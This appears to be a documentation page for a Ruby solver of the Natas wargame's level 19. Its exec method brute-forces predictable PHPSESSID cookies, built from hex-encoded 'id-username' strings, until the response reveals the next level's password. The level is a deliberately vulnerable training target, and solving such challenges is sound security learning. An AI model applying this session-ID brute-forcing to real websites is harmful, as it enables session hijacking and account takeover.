class NatasLevel19
Level 19
Constants
- LEVEL
- MAX_ID
- PAGE
- USERNAME
Public Instance Methods
exec()
click to toggle source
# File lib/natas.rb, line 592 def exec log('Bruteforcing PHPSESSID') MAX_ID.times do |id| session_id = "#{id}-#{USERNAME}".unpack1('H*') data = post( PAGE, { 'Cookie' => "PHPSESSID=#{session_id}" }, { 'username' => USERNAME, 'password' => '' } ).body match = %r(Password: (\w{32})</pre>).match(data) next unless match log("Found session: #{session_id}") return found(match[1]) end not_found end